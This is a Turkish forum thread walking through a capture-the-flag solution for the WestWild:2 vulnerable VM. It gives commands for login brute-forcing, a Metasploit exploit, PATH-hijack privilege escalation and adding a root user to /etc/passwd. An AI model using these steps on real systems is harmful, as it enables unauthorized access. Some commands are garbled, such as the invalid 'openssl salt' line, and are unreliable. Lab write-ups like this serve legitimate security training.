THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
04-12-2019 22:43
#1
WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere "Westwild: 2 zafiyetli makinesinin "çözümünü göstereceğim.



https://drive.google.com/file/d/1owI...z76OX6KsT/view



Makine İsmi: Westwild:2

Yapımcı: Hashim Alsharef

Seri: Westwild

Açıklama: Hedefte ki Flag'ı bulmak

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta




İlk olarak ağ taraması yapalım
Kod:
netdiscover


Hedefimiz IP adresini bulduk gördüğünüz gibi.



NMAP taraması yaptığımızda ssh ve http portları açık olduğunu görüyoruz.



Siteye gittik ve normal bir site tasarımı olduğunu gördük. Tıklanak yerlere tıklayıp kaynak kodlarına baktım fakat bir şey bulamadım.



Daha sonra siteyi kazımak için dirb aracını kullandım. admin/aspadmin olduğunu gördüm şansımı denemek için oraya gittim.



Burada 2 adet dosya olduğunu gördüm. Bunlar şifre ve kullanıcı adı listesiydi.



Bunları çekmek için
Kod:
wget http://192.168.1.105/admin/aspadmin/user.list
wget http://192.168.1.105/admin/aspadmin/password.list
yazdım ve dosyaları indirdim. İçlerine baktığımda listeler olduğunu gördüm.





Daha sonra admin/login.php olduğunu görmüştüm siteyi kazıdığımda. Oraya girdiğim de giriş ekranı geldiğini gördüm. Burp ile siteye istek gönderdim.



Daha sonra sağ tık yapıp Intruder'e yolladım.



Cluster Bomb'ı seçtim ve sağdan Clear diyelim. Ardından kullanıcı adında ki admin ve şifrede ki admin kısımlarına sağdan Add yapalım.



Payloads kısmına gelerek 1'e kullanıcı adlarını 2'ye de şifre listelerini ekliyelim.



Ardından tekrar Positions kısmına gelerek sağda ki Attack kısmına tıklayalım ve saldırı başlasın Bir süre sonra kullanıcı adı ve şifreyi bulduk.



Ardından siteye tekrar giderek giriş yaptığımızda böyle bir admin paneli karşılıyor bizleri



Content kısmında Showtime2'ye tıkladık.



İnternette biraz araştırma yaptıktan sonra exploiti olduğunu öğrendim. msfconsole yazarak terminalde açalım.



Ardından search showtime2 yazalım ve exploiti arayalım. Ayarlarını görmek için
Kod:
show options
yazalım.



Gerekli ayarları yapmak için
Kod:
set RHOSTS 192.168.1.8
set USERNAME west
set PASSWORD madison
yazalım ve exploit yazarak exploit'i çalıştıralım. Ardından meterpreter de shell yazalım.



Tam olarak giriş yapamadık yani izin vermedi. O yüzden python yardımıyla bunu düzelteceğiz. Tekrar konsola
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
yazalım.
Gördüğünüz gibi izni aldık
SUID iznine sahip dosyaları bulmak için
Kod:
find / -perm -u=s -type f 2>/dev/null
yazalım.
Bizlere /usr/bin/network_info isimli bir dosya verdi bunu daha da açacağız.



Kod:
cd /tmp
ile tmp dizinine girelim. Ardından
Kod:
echo "/bin/bash" > ifconfig
yazalım. Bir komut yazdığımızda PATH değişkeni bizlere dönüt verir. Yetki yükseltmek için
Kod:
chmod 777 ifconfig
ve
Kod:
export PATH=/tmp:$PATH
ardından west kullanıcısına gitmek için
Kod:
/usr/bin/network_info
yazalım ve
Kod:
whoami
yazdık. Gördüğünüz gibi wside isimli bir kullanıcı olduğunu göstermektedir.



LinEnum ile yetki yükseltmesi yapacağız. Bunun için
Kod:
git clone https://github.com/rebootuser/LinEnum/
yazalım ardından
Kod:
chmod 777 LinEnum.sh
yazarak yetkisini yükseltelim. Ardından çalıştırmak için
Kod:
./LinEnum.sh
yazalım.





Burada root ile passwd dizininde işlem yapılmış.



Burada biraz zorlandım açıkcası fakat sonra openssl salt yöntemi ile çözümü buldum. Bu yöntem ile MD5 ile şifrelenmiş karma bir şifre verir bizlere. Terminale
Kod:
openssl salt -1 user pass123
yazalım ve kodu kopyalayalım.



Daha sonra makineye tekrar gelerek
Kod:
echo 'p4rstht:$1$user3$rAGRVf5p2jYTqt0W5cPu/:0:0::/root:/bin/bash' >> /etc/passwd
yazalım ve yetkiyi alalım. Ardından
Kod:
su p4rstht
yazalım ve şifreyi yazalım. İşlem başarılı!



FLAG'ı aldık (:







Konum bu kadardı arkadaşlar, bir sonraki konumda görüşmek üzere sağlıcakla...







Konu "P4RS tarafından (05-12-2019 10:59 Saat 10:59 ) değiştirilmiştir.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
379
Konular:
69
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
04-12-2019 22:45
#2
Cevap: WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS
Tam istediğim zafiyetli makine. Eline sağlık
aliyestero - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
89
Konular:
17
Teşekkür (Etti):
45
Teşekkür (Aldı):
18
Ticaret:
(0) %
05-12-2019 00:06
#3
Cevap: WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS
Elinize sağlık hocam buram buram emek var
--------------------- İhanetinin Nedeni Olmaz Bedeli oLur...
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
05-12-2019 09:33
#4
Cevap: WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS
Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Tam istediğim zafiyetli makine. Eline sağlık
Alıntı:
aliyestero´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam buram buram emek var
Eyvallah arkadaşlar beğenmenize sevindim

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler